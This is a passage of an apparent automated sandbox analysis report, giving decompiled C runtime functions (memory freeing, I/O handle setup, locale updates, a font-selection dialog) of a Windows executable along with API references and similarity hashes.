					E010A8C4B(_t7);
					 *0x10c2a54 = 0;
				}
				_t8 = InterlockedDecrement( *0x10c16fc);
				if(_t8 == 0) {
					_t8 =  *0x10c16fc; // 0x10c19f8
					if(_t8 != 0x10c19f8) {
						_t9 = E010A8C4B(_t8);
						 *0x10c16fc = 0x10c19f8;
						return _t9;
					}
				}
				return _t8;
			}










                                                  0x010a43d6
                                                  0x010a43de
                                                  0x010a43e4
                                                  0x010a43ea
                                                  0x010a43ee
                                                  0x010a43f0
                                                  0x010a43f7
                                                  0x010a43fd
                                                  0x010a4400
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x010a4400
                                                  0x010a4402
                                                  0x010a4402
                                                  0x010a4408
                                                  0x010a440a
                                                  0x010a440f
                                                  0x010a4418
                                                  0x010a4420
                                                  0x010a4422
                                                  0x010a4428
                                                  0x010a442e
                                                  0x010a4431
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x010a4431
                                                  0x010a4433
                                                  0x010a4433
                                                  0x010a443a
                                                  0x010a4445
                                                  0x010a444b
                                                  0x010a4456
                                                  0x010a445e
                                                  0x010a4464
                                                  0x010a446d
                                                  0x010a4470
                                                  0x010a4475
                                                  0x010a4477
                                                  0x010a447d
                                                  0x010a4482
                                                  0x010a4489
                                                  0x010a448c
                                                  0x010a4492
                                                  0x010a4492
                                                  0x010a4498
                                                  0x010a449f
                                                  0x010a44a2
                                                  0x010a44a8
                                                  0x010a44a8
                                                  0x010a44b4
                                                  0x010a44bd
                                                  0x010a44bf
                                                  0x010a44cb
                                                  0x010a44ce
                                                  0x010a44d4
                                                  0x00000000
                                                  0x010a44d4
                                                  0x010a44cb
                                                  0x010a44dc

                                                  APIs
                                                  • DecodePointer.KERNEL32 ref: 010A43DE
                                                  • _free.LIBCMT ref: 010A43F7
                                                    • Part of subcall function 010A8C4B: HeapFree.KERNEL32(00000000,00000000,?,010A88AB,00000000,?,?,010A7B46,010A3D79,010BEFC0,00000014), ref: 010A8C5F
                                                    • Part of subcall function 010A8C4B: GetLastError.KERNEL32(010C15B0,?,010A88AB,00000000,?,?,010A7B46,010A3D79,010BEFC0,00000014), ref: 010A8C71
                                                  • _free.LIBCMT ref: 010A440A
                                                  • _free.LIBCMT ref: 010A4428
                                                  • _free.LIBCMT ref: 010A443A
                                                  • _free.LIBCMT ref: 010A444B
                                                  • _free.LIBCMT ref: 010A4456
                                                  • _free.LIBCMT ref: 010A4470
                                                  • EncodePointer.KERNEL32(00000000), ref: 010A4477
                                                  • _free.LIBCMT ref: 010A448C
                                                  • _free.LIBCMT ref: 010A44A2
                                                  • InterlockedDecrement.KERNEL32 ref: 010A44B4
                                                  • _free.LIBCMT ref: 010A44CE
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: _free$Pointer$DecodeDecrementEncodeErrorFreeHeapInterlockedLast
                                                  • String ID:
                                                  • API String ID: 4264854383-0
                                                  • Opcode ID: 3f59c820730e33b1437fc1078dd92d109ec86f0f677a9cd5f6c42cd606024b40
                                                  • Instruction ID: 49cb8943cc238bacaf1c82f7eb73b6b2babcfc6f048d7d3298659976d4d44964
                                                  • Opcode Fuzzy Hash: 3f59c820730e33b1437fc1078dd92d109ec86f0f677a9cd5f6c42cd606024b40
                                                  • Instruction Fuzzy Hash: 88210879801212DFE7386FECF9544463FA4FB55722398816AEAC4E7559CF7E48828F40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010A7366 Relevance: 16.7, APIs: 11, Instructions: 229COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 86%
                                                  			E010A7366(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t81;
				void* _t86;
				long _t90;
				intOrPtr _t94;
				signed int _t98;
				signed int _t99;
				signed char _t103;
				intOrPtr* _t105;
				intOrPtr _t106;
				intOrPtr* _t109;
				signed char _t111;
				long _t119;
				signed int _t130;
				signed int* _t134;
				intOrPtr _t135;
				signed int* _t138;
				void** _t139;
				intOrPtr _t141;
				void* _t142;
				signed int _t143;
				void** _t147;
				signed int _t149;
				void* _t150;
				void** _t154;
				void* _t155;

				_push(0x64);
				_push(0x10bf168);
				E010A61F0(__ebx, __edi, __esi);
				E010A8834(0xb);
				_t130 = 0;
				 *(_t155 - 4) = 0;
				if( *0x10c2de0 == 0) {
					_push(0x40);
					_t141 = 0x20;
					_push(_t141);
					_t81 = E010A8C83();
					_t134 = _t81;
					 *(_t155 - 0x24) = _t134;
					if(_t134 != 0) {
						 *0x10c2de0 = _t81;
						 *0x10c2dc0 = _t141;
						while(_t134 <  &(_t81[0x200])) {
							_t134[1] = 0xa00;
							 *_t134 =  *_t134 | 0xffffffff;
							_t134[2] = _t130;
							_t134[9] = _t134[9] & 0x00000080;
							_t134[9] = _t134[9] & 0x0000007f;
							_t134[9] = 0xa0a;
							_t134[0xe] = _t130;
							_t134[0xd] = _t130;
							_t134 =  &(_t134[0x10]);
							 *(_t155 - 0x24) = _t134;
							_t81 =  *0x10c2de0;
						}
						GetStartupInfoW(_t155 - 0x74);
						if( *((short*)(_t155 - 0x42)) == 0) {
							while(1) {
								L31:
								 *(_t155 - 0x2c) = _t130;
								if(_t130 >= 3) {
									break;
								}
								_t147 =  *0x10c2de0 + (_t130 << 6);
								 *(_t155 - 0x24) = _t147;
								if( *_t147 == 0xffffffff ||  *_t147 == 0xfffffffe) {
									_t147[1] = 0x81;
									if(_t130 != 0) {
										_t66 = _t130 - 1; // -1
										asm("sbb eax, eax");
										_t90 =  ~_t66 + 0xfffffff5;
									} else {
										_t90 = 0xfffffff6;
									}
									_t142 = GetStdHandle(_t90);
									if(_t142 == 0xffffffff || _t142 == 0) {
										L47:
										_t147[1] = _t147[1] | 0x00000040;
										 *_t147 = 0xfffffffe;
										_t94 =  *0x10c2ee4;
										if(_t94 != 0) {
											 *( *((intOrPtr*)(_t94 + _t130 * 4)) + 0x10) = 0xfffffffe;
										}
										goto L49;
									} else {
										_t98 = GetFileType(_t142);
										if(_t98 == 0) {
											goto L47;
										}
										 *_t147 = _t142;
										_t99 = _t98 & 0x000000ff;
										if(_t99 != 2) {
											if(_t99 != 3) {
												L46:
												_t70 =  &(_t147[3]); // -17575380
												InitializeCriticalSectionAndSpinCount(_t70, 0xfa0);
												_t147[2] = _t147[2] + 1;
												goto L49;
											}
											_t103 = _t147[1] | 0x00000008;
											L45:
											_t147[1] = _t103;
											goto L46;
										}
										_t103 = _t147[1] | 0x00000040;
										goto L45;
									}
								} else {
									_t147[1] = _t147[1] | 0x00000080;
									L49:
									_t130 = _t130 + 1;
									continue;
								}
							}
							 *(_t155 - 4) = 0xfffffffe;
							E010A762A();
							L2:
							_t86 = 1;
							L3:
							return E010A6235(_t86);
						}
						_t105 =  *((intOrPtr*)(_t155 - 0x40));
						if(_t105 == 0) {
							goto L31;
						}
						_t135 =  *_t105;
						 *((intOrPtr*)(_t155 - 0x1c)) = _t135;
						_t106 = _t105 + 4;
						 *((intOrPtr*)(_t155 - 0x28)) = _t106;
						 *(_t155 - 0x20) = _t106 + _t135;
						if(_t135 >= 0x800) {
							_t135 = 0x800;
							 *((intOrPtr*)(_t155 - 0x1c)) = 0x800;
						}
						_t149 = 1;
						 *(_t155 - 0x30) = 1;
						while( *0x10c2dc0 < _t135) {
							_t138 = E010A8C83(_t141, 0x40);
							 *(_t155 - 0x24) = _t138;
							if(_t138 != 0) {
								0x10c2de0[_t149] = _t138;
								 *0x10c2dc0 =  *0x10c2dc0 + _t141;
								while(_t138 <  &(0x10c2de0[_t149][0x200])) {
									_t138[1] = 0xa00;
									 *_t138 =  *_t138 | 0xffffffff;
									_t138[2] = _t130;
									_t138[9] = _t138[9] & 0x00000080;
									_t138[9] = 0xa0a;
									_t138[0xe] = _t130;
									_t138[0xd] = _t130;
									_t138 =  &(_t138[0x10]);
									 *(_t155 - 0x24) = _t138;
								}
								_t149 = _t149 + 1;
								 *(_t155 - 0x30) = _t149;
								_t135 =  *((intOrPtr*)(_t155 - 0x1c));
								continue;
							}
							_t135 =  *0x10c2dc0;
							 *((intOrPtr*)(_t155 - 0x1c)) = _t135;
							break;
						}
						_t143 = _t130;
						 *(_t155 - 0x2c) = _t143;
						_t109 =  *((intOrPtr*)(_t155 - 0x28));
						_t139 =  *(_t155 - 0x20);
						while(_t143 < _t135) {
							_t150 =  *_t139;
							if(_t150 == 0xffffffff || _t150 == 0xfffffffe) {
								L26:
								_t143 = _t143 + 1;
								 *(_t155 - 0x2c) = _t143;
								_t109 =  *((intOrPtr*)(_t155 - 0x28)) + 1;
								 *((intOrPtr*)(_t155 - 0x28)) = _t109;
								_t139 =  &(_t139[1]);
								 *(_t155 - 0x20) = _t139;
								continue;
							} else {
								_t111 =  *_t109;
								if((_t111 & 0x00000001) == 0) {
									goto L26;
								}
								if((_t111 & 0x00000008) != 0) {
									L24:
									_t154 = 0x10c2de0[_t143 >> 5] + ((_t143 & 0x0000001f) << 6);
									 *(_t155 - 0x24) = _t154;
									 *_t154 =  *_t139;
									_t154[1] =  *((intOrPtr*)( *((intOrPtr*)(_t155 - 0x28))));
									_t38 =  &(_t154[3]); // 0xd
									InitializeCriticalSectionAndSpinCount(_t38, 0xfa0);
									_t154[2] = _t154[2] + 1;
									_t139 =  *(_t155 - 0x20);
									L25:
									_t135 =  *((intOrPtr*)(_t155 - 0x1c));
									goto L26;
								}
								_t119 = GetFileType(_t150);
								_t139 =  *(_t155 - 0x20);
								if(_t119 == 0) {
									goto L25;
								}
								goto L24;
							}
						}
						goto L31;
					}
					E010A6430(_t155, 0x10c12e0, _t155 - 0x10, 0xfffffffe);
					_t86 = 0;
					goto L3;
				}
				E010A6430(_t155, 0x10c12e0, _t155 - 0x10, 0xfffffffe);
				goto L2;
			}




























                                                  0x010a7366
                                                  0x010a7368
                                                  0x010a736d
                                                  0x010a7374
                                                  0x010a737a
                                                  0x010a737c
                                                  0x010a7385
                                                  0x010a73a5
                                                  0x010a73a9
                                                  0x010a73aa
                                                  0x010a73ab
                                                  0x010a73b2
                                                  0x010a73b4
                                                  0x010a73b9
                                                  0x010a73d2
                                                  0x010a73d7
                                                  0x010a73dd
                                                  0x010a73e6
                                                  0x010a73ec
                                                  0x010a73ef
                                                  0x010a73f2
                                                  0x010a73fb
                                                  0x010a73fe
                                                  0x010a7404
                                                  0x010a7407
                                                  0x010a740a
                                                  0x010a740d
                                                  0x010a7410
                                                  0x010a7410
                                                  0x010a741b
                                                  0x010a7426
                                                  0x010a7555
                                                  0x010a7555
                                                  0x010a7555
                                                  0x010a755b
                                                  0x00000000
                                                  0x00000000
                                                  0x010a7566
                                                  0x010a756c
                                                  0x010a7572
                                                  0x010a7587
                                                  0x010a758d
                                                  0x010a7594
                                                  0x010a7599
                                                  0x010a759b
                                                  0x010a758f
                                                  0x010a7591
                                                  0x010a7591
                                                  0x010a75a5
                                                  0x010a75aa
                                                  0x010a75f1
                                                  0x010a75f7
                                                  0x010a75fa
                                                  0x010a7600
                                                  0x010a7607
                                                  0x010a760c
                                                  0x010a760c
                                                  0x00000000
                                                  0x010a75b0
                                                  0x010a75b1
                                                  0x010a75b9
                                                  0x00000000
                                                  0x00000000
                                                  0x010a75bb
                                                  0x010a75bd
                                                  0x010a75c5
                                                  0x010a75d2
                                                  0x010a75dd
                                                  0x010a75e2
                                                  0x010a75e6
                                                  0x010a75ec
                                                  0x00000000
                                                  0x010a75ec
                                                  0x010a75d8
                                                  0x010a75da
                                                  0x010a75da
                                                  0x00000000
                                                  0x010a75da
                                                  0x010a75cb
                                                  0x00000000
                                                  0x010a75cb
                                                  0x010a7579
                                                  0x010a757f
                                                  0x010a7613
                                                  0x010a7613
                                                  0x00000000
                                                  0x010a7613
                                                  0x010a7572
                                                  0x010a7619
                                                  0x010a7620
                                                  0x010a739a
                                                  0x010a739c
                                                  0x010a739d
                                                  0x010a73a2
                                                  0x010a73a2
                                                  0x010a742c
                                                  0x010a7431
                                                  0x00000000
                                                  0x00000000
                                                  0x010a7437
                                                  0x010a7439
                                                  0x010a743c
                                                  0x010a743f
                                                  0x010a7444
                                                  0x010a744e
                                                  0x010a7450
                                                  0x010a7452
                                                  0x010a7452
                                                  0x010a7457
                                                  0x010a7458
                                                  0x010a745b
                                                  0x010a746d
                                                  0x010a746f
                                                  0x010a7474
                                                  0x010a7508
                                                  0x010a750f
                                                  0x010a7515
                                                  0x010a7525
                                                  0x010a752b
                                                  0x010a752e
                                                  0x010a7531
                                                  0x010a7535
                                                  0x010a753b
                                                  0x010a753e
                                                  0x010a7541
                                                  0x010a7544
                                                  0x010a7544
                                                  0x010a7549
                                                  0x010a754a
                                                  0x010a754d
                                                  0x00000000
                                                  0x010a754d
                                                  0x010a747a
                                                  0x010a7480
                                                  0x00000000
                                                  0x010a7480
                                                  0x010a7483
                                                  0x010a7485
                                                  0x010a7488
                                                  0x010a748b
                                                  0x010a748e
                                                  0x010a7496
                                                  0x010a749b
                                                  0x010a74f5
                                                  0x010a74f5
                                                  0x010a74f6
                                                  0x010a74fc
                                                  0x010a74fd
                                                  0x010a7500
                                                  0x010a7503
                                                  0x00000000
                                                  0x010a74a2
                                                  0x010a74a2
                                                  0x010a74a6
                                                  0x00000000
                                                  0x00000000
                                                  0x010a74aa
                                                  0x010a74ba
                                                  0x010a74c7
                                                  0x010a74ce
                                                  0x010a74d3
                                                  0x010a74da
                                                  0x010a74e2
                                                  0x010a74e6
                                                  0x010a74ec
                                                  0x010a74ef
                                                  0x010a74f2
                                                  0x010a74f2
                                                  0x00000000
                                                  0x010a74f2
                                                  0x010a74ad
                                                  0x010a74b3
                                                  0x010a74b8
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x010a74b8
                                                  0x010a749b
                                                  0x00000000
                                                  0x010a748e
                                                  0x010a73c6
                                                  0x010a73ce
                                                  0x00000000
                                                  0x010a73ce
                                                  0x010a7392
                                                  0x00000000

                                                  APIs
                                                  • __lock.LIBCMT ref: 010A7374
                                                    • Part of subcall function 010A8834: __mtinitlocknum.LIBCMT ref: 010A8846
                                                    • Part of subcall function 010A8834: __amsg_exit.LIBCMT ref: 010A8852
                                                    • Part of subcall function 010A8834: EnterCriticalSection.KERNEL32(00000000,?,010A7AC9,0000000D), ref: 010A885F
                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 010A7392
                                                  • __calloc_crt.LIBCMT ref: 010A73AB
                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 010A73C6
                                                  • GetStartupInfoW.KERNEL32(?,010BF168,00000064), ref: 010A741B
                                                  • __calloc_crt.LIBCMT ref: 010A7466
                                                  • GetFileType.KERNEL32(00000001), ref: 010A74AD
                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 010A74E6
                                                  • GetStdHandle.KERNEL32(-000000F6), ref: 010A759F
                                                  • GetFileType.KERNEL32(00000000), ref: 010A75B1
                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(-010C2DD4,00000FA0), ref: 010A75E6
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$CallCountFileFilterFunc@8InitializeSpinType__calloc_crt$EnterHandleInfoStartup__amsg_exit__lock__mtinitlocknum
                                                  • String ID:
                                                  • API String ID: 301580142-0
                                                  • Opcode ID: 45094ab88985f9fa112cef7e77d96cca6fb8f266cc24d37cd8c97db0fd12efa3
                                                  • Instruction ID: d1f24fc3699efed2d4afe8025cc911d00276a7615ee5998c638286cda392c291
                                                  • Opcode Fuzzy Hash: 45094ab88985f9fa112cef7e77d96cca6fb8f266cc24d37cd8c97db0fd12efa3
                                                  • Instruction Fuzzy Hash: B691B3719043468FDB24CFB8C8805ADBFF4AF09325B54866ED4E6AB3C1DB769802CB54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010B6818 Relevance: 15.1, APIs: 10, Instructions: 131COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  C-Code - Quality: 84%
                                                  			E010B6818(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, char _a12) {
				signed int _v8;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				void* _t38;
				signed int _t45;
				signed int _t60;
				intOrPtr _t77;
				void* _t80;
				intOrPtr* _t82;
				signed int _t83;
				signed int _t86;
				intOrPtr _t88;
				void* _t92;

				_t80 = __edx;
				_push(__ebx);
				_push(__esi);
				_t86 = 0;
				if(_a12 <= 0) {
					L5:
					return _t38;
				} else {
					_push(__edi);
					_t82 =  &_a12;
					while(1) {
						_t82 = _t82 + 4;
						_t38 = E010A412F(_a4, _a8,  *_t82);
						_t92 = _t92 + 0xc;
						if(_t38 != 0) {
							break;
						}
						_t86 = _t86 + 1;
						if(_t86 < _a12) {
							continue;
						} else {
							goto L5;
						}
						goto L20;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E010A4060(0, _t80);
					asm("int3");
					_push(0x14);
					_push(0x10bf590);
					E010A61F0(0, _t82, _t86);
					_t66 = 0;
					_v32 = 0;
					__eflags = _a4 - 5;
					if(_a4 <= 5) {
						_t88 = E010A7A00();
						_v36 = _t88;
						E010AEBF8(0, _t80, _t82, _t88, __eflags);
						 *(_t88 + 0x70) =  *(_t88 + 0x70) | 0x00000010;
						_v8 = _v8 & 0;
						_t83 = E010A8C83(0xb8, 1);
						_v40 = _t83;
						__eflags = _t83;
						if(_t83 != 0) {
							E010A8834(0xc);
							_v8 = 1;
							E010B6250(_t83,  *((intOrPtr*)(_t88 + 0x6c)));
							_v8 = _v8 & 0x00000000;
							E010B698D();
							_t66 = E010B6B48(0, _t80, _t83, _t88, _t83, _a4, _a8);
							_v32 = _t66;
							__eflags = _t66;
							if(_t66 == 0) {
								E010AEB5D(_t83);
								_t43 = E010AEA03(_t83);
							} else {
								__eflags = _a8;
								if(_a8 != 0) {
									_t60 = E010BA6E7(_a8, 0x10c1c34);
									__eflags = _t60;
									if(_t60 != 0) {
										 *0x10c2d94 = 1;
									}
								}
								E010A8834(0xc);
								_v8 = 2;
								_t25 = _t88 + 0x6c; // 0x6c
								E010AEC74(_t25, _t83);
								E010AEB5D(_t83);
								__eflags =  *(_t88 + 0x70) & 0x00000002;
								if(( *(_t88 + 0x70) & 0x00000002) == 0) {
									__eflags =  *0x10c1e64 & 0x00000001;
									if(( *0x10c1e64 & 0x00000001) == 0) {
										E010AEC74(0x10c1d9c,  *((intOrPtr*)(_t88 + 0x6c)));
										_t77 =  *0x10c1d9c; // 0x10c1da0
										_t32 = _t77 + 0x84; // 0x10c1e78
										 *0x10c1e70 =  *_t32;
										_t33 = _t77 + 0x90; // 0x10bd700
										 *0x10c1ecc =  *_t33;
										_t34 = _t77 + 0x74; // 0x1
										 *0x10c1e60 =  *_t34;
									}
								}
								_v8 = _v8 & 0x00000000;
								_t43 = E010B699C();
							}
						}
						_v8 = 0xfffffffe;
						E010B69CF(_t43, _t88);
						_t45 = _t66;
					} else {
						 *((intOrPtr*)(E010A6117())) = 0x16;
						E010A4035();
						_t45 = 0;
					}
					return E010A6235(_t45);
				}
				L20:
			}

















                                                  0x010b6818
                                                  0x010b681b
                                                  0x010b681e
                                                  0x010b681f
                                                  0x010b6824
                                                  0x010b6848
                                                  0x010b684b
                                                  0x010b6826
                                                  0x010b6826
                                                  0x010b6827
                                                  0x010b682a
                                                  0x010b682a
                                                  0x010b6835
                                                  0x010b683a
                                                  0x010b683f
                                                  0x00000000
                                                  0x00000000
                                                  0x010b6841
                                                  0x010b6845
                                                  0x00000000
                                                  0x010b6847
                                                  0x00000000
                                                  0x010b6847
                                                  0x00000000
                                                  0x010b6845
                                                  0x010b684c
                                                  0x010b684d
                                                  0x010b684e
                                                  0x010b684f
                                                  0x010b6850
                                                  0x010b6851
                                                  0x010b6856
                                                  0x010b6857
                                                  0x010b6859
                                                  0x010b685e
                                                  0x010b6863
                                                  0x010b6865
                                                  0x010b6868
                                                  0x010b686c
                                                  0x010b688a
                                                  0x010b688c
                                                  0x010b688f
                                                  0x010b6894
                                                  0x010b6898
                                                  0x010b68a9
                                                  0x010b68ab
                                                  0x010b68ae
                                                  0x010b68b0
                                                  0x010b68b8
                                                  0x010b68be
                                                  0x010b68c9
                                                  0x010b68d0
                                                  0x010b68d4
                                                  0x010b68e8
                                                  0x010b68ea
                                                  0x010b68ed
                                                  0x010b68ef
                                                  0x010b69a8
                                                  0x010b69ae
                                                  0x010b68f5
                                                  0x010b68f5
                                                  0x010b68f9
                                                  0x010b6903
                                                  0x010b690a
                                                  0x010b690c
                                                  0x010b690e
                                                  0x010b690e
                                                  0x010b690c
                                                  0x010b691a
                                                  0x010b6920
                                                  0x010b6927
                                                  0x010b692c
                                                  0x010b6932
                                                  0x010b693a
                                                  0x010b693e
                                                  0x010b6940
                                                  0x010b6947
                                                  0x010b6951
                                                  0x010b6958
                                                  0x010b695e
                                                  0x010b6964
                                                  0x010b6969
                                                  0x010b696f
                                                  0x010b6974
                                                  0x010b6977
                                                  0x010b6977
                                                  0x010b6947
                                                  0x010b697c
                                                  0x010b6980
                                                  0x010b6980
                                                  0x010b68ef
                                                  0x010b69b5
                                                  0x010b69bc
                                                  0x010b69c1
                                                  0x010b686e
                                                  0x010b6873
                                                  0x010b6879
                                                  0x010b687e
                                                  0x010b687e
                                                  0x010b69c8
                                                  0x010b69c8
                                                  0x00000000

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock
                                                  • String ID:
                                                  • API String ID: 790675137-0
                                                  • Opcode ID: fee3a7946a8ac0add862ecac9c5c939c24ccd49d8376d158de31346c2cfb0658
                                                  • Instruction ID: efe6c5876d71e908daa36a8e4fc6b21211ce6033b50e6187086db5f758fb727b
                                                  • Opcode Fuzzy Hash: fee3a7946a8ac0add862ecac9c5c939c24ccd49d8376d158de31346c2cfb0658
                                                  • Instruction Fuzzy Hash: F941027240030AEFDB10AFE8E884BDD7BF4AF24314F10416DE9999A281DBB79601CF61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010B4EB3 Relevance: 13.6, APIs: 9, Instructions: 66COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E010B4EB3(void* __eflags, signed int _a4) {
				void* _t12;
				signed int _t13;
				signed int _t16;
				intOrPtr _t18;
				void* _t22;
				signed int _t35;
				long _t40;

				_t13 = E010A732B(_t12);
				if(_t13 >= 0) {
					_t35 = _a4;
					if(E010AE743(_t35) == 0xffffffff) {
						L10:
						_t40 = 0;
					} else {
						_t18 =  *0x10c2de0;
						if(_t35 != 1 || ( *(_t18 + 0x84) & 0x00000001) == 0) {
							if(_t35 != 2 || ( *(_t18 + 0x44) & 0x00000001) == 0) {
								goto L8;
							} else {
								goto L7;
							}
						} else {
							L7:
							_t22 = E010AE743(2);
							if(E010AE743(1) == _t22) {
								goto L10;
							} else {
								L8:
								if(CloseHandle(E010AE743(_t35)) != 0) {
									goto L10;
								} else {
									_t40 = GetLastError();
								}
							}
						}
					}
					E010AE6BD(_t35);
					 *((char*)( *((intOrPtr*)(0x10c2de0 + (_t35 >> 5) * 4)) + ((_t35 & 0x0000001f) << 6) + 4)) = 0;
					if(_t40 == 0) {
						_t16 = 0;
					} else {
						_t16 = E010A60F6(_t40) | 0xffffffff;
					}
					return _t16;
				} else {
					return _t13 | 0xffffffff;
				}
			}










                                                  0x010b4eb6
                                                  0x010b4ebd
                                                  0x010b4ec6
                                                  0x010b4ed3
                                                  0x010b4f25
                                                  0x010b4f25
                                                  0x010b4ed5
                                                  0x010b4ed5
                                                  0x010b4edd
                                                  0x010b4eeb
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x010b4ef3
                                                  0x010b4ef3
                                                  0x010b4ef5
                                                  0x010b4f07
                                                  0x00000000
                                                  0x010b4f09
                                                  0x010b4f09
                                                  0x010b4f19
                                                  0x00000000
                                                  0x010b4f1b
                                                  0x010b4f21
                                                  0x010b4f21
                                                  0x010b4f19
                                                  0x010b4f07
                                                  0x010b4edd
                                                  0x010b4f28
                                                  0x010b4f40
                                                  0x010b4f47
                                                  0x010b4f55
                                                  0x010b4f49
                                                  0x010b4f50
                                                  0x010b4f50
                                                  0x010b4f5a
                                                  0x010b4ebf
                                                  0x010b4ec3
                                                  0x010b4ec3

                                                  APIs
                                                  • __ioinit.LIBCMT ref: 010B4EB6
                                                    • Part of subcall function 010A732B: InitOnceExecuteOnce.KERNEL32(010C27C0,010A7366,00000000,00000000,010B310F,00000109), ref: 010A7339
                                                  • __get_osfhandle.LIBCMT ref: 010B4ECA
                                                  • __get_osfhandle.LIBCMT ref: 010B4EF5
                                                  • __get_osfhandle.LIBCMT ref: 010B4EFE
                                                  • __get_osfhandle.LIBCMT ref: 010B4F0A
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,?,010B34E2,?,?,?,?,?,?,?,?,010A28B9,?,00000109), ref: 010B4F11
                                                  • GetLastError.KERNEL32(?,010B34E2,?,?,?,?,?,?,?,?,010A28B9,?,00000109), ref: 010B4F1B
                                                  • __free_osfhnd.LIBCMT ref: 010B4F28
                                                  • __dosmaperr.LIBCMT ref: 010B4F4A
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: __get_osfhandle$Once$CloseErrorExecuteHandleInitLast__dosmaperr__free_osfhnd__ioinit
                                                  • String ID:
                                                  • API String ID: 974577687-0
                                                  • Opcode ID: 5a509d894aa871d30884bdfd4e17dfc0b918dd6ca09539b7a98c6d676df5daeb
                                                  • Instruction ID: f86e46c417653817b8e0905dd52ce2df119757fb38dfdc4208d81a367b7fdf73
                                                  • Opcode Fuzzy Hash: 5a509d894aa871d30884bdfd4e17dfc0b918dd6ca09539b7a98c6d676df5daeb
                                                  • Instruction Fuzzy Hash: 1E118C3260511215E671227CA8CC7FE3BD85B92730F590388F9EECB1C3FE65C2418280
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010A2340 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 51windowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E010A2340() {
				struct %anon40 _v64;
				void _v156;
				int _t19;
				int _t23;
				void* _t25;

				memcpy( &_v156, 0x10c3f40, 0x17 << 2);
				E010A66E0( &_v64, 0, 0x3c);
				_v64.hwndOwner =  *0x10c3f24;
				_v64.lpLogFont =  &_v156;
				_v64.lStructSize = 0x3c;
				_v64.Flags = 0x1000041;
				_t19 = ChooseFontW( &_v64);
				if(_t19 != 0) {
					_t25 =  *0x10c3f30;
					 *0x10c3f30 = CreateFontIndirectW( &_v156);
					memcpy(0x10c3f40,  &_v156, 0x17 << 2);
					_t23 = SendMessageW( *0x10c3f2c, 0x30,  *0x10c3f30, 1);
					if(_t25 != 0) {
						_t23 = DeleteObject(_t25);
					}
